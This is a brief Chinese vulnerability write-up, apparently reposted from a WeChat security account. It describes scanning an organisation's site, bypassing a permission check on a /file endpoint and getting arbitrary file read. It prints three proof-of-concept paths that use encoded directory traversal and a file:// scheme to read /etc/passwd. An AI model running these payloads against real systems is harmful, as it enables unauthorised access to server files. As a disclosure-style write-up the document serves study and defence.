网站的页面是这样的
然后通过dirsearch工具对其进行目录扫描,发现有一个/file目录的路径
然后又通过字典继续跑,发现了burp的返回包提示说 权限不够
然后通过bypass了一下,就明显返回包数据量变大了
返回包一看,任意文件读取漏洞
POC如下:
/file/file%3a//%20//etc/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
/file/file:// //etc/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/file/file:// //etc/../../../../../../../../../../etc/passwd
具体是如何导致的,我的猜想应该是:
在后端代码中
第一个 file 可能代表一个特定的命令,这取决于它在原始环境中的使用方式。
第二个 file直接指向一个本地文件路径,例如 file:///etc/passwd 会指向本地系统的 /etc/passwd 文件。
原文始发于微信公众号(漏洞谷):某单位一次神奇的任意文件读取漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论